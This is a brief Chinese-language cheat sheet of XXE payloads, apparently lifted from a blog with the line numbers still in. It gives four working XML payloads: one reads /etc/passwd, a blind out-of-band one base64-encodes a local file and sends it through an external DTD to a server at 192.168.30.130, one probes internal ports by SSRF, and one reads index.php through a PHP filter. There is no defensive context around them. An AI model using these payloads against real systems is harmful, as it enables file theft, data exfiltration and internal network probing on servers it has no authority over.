XXE payload
1、有回显—读服务器文件:
1
2
3
4
5
6
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "file:///etc/passwd">
<!--<!ENTITY content SYSTEM "file:///c://Windows//System32//test.txt">-->
]>
<x>&content;</x>
2、无回显-读取文件
1
2
3
4
5
6
7
8
9
10
11
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY % dtd SYSTEM "http://192.168.30.130:8081/test.dtd">
%dtd;
%send;
]>
test.dtd:
<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://192.168.30.130:8081/?data=%file;'>">
%payload;
2、SSRF—探测端口:
适用于有回显和blind xxe,也是外部一般实体:
1
2
3
4
5
6
7
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "http://10.165.89.150:88">]>
<name>&content;</name>
3、如果是php的话,可以用php的filter协议直接读出文件
1
2
3
4
5
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY>
<!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]>
<creds>&goodies;</creds>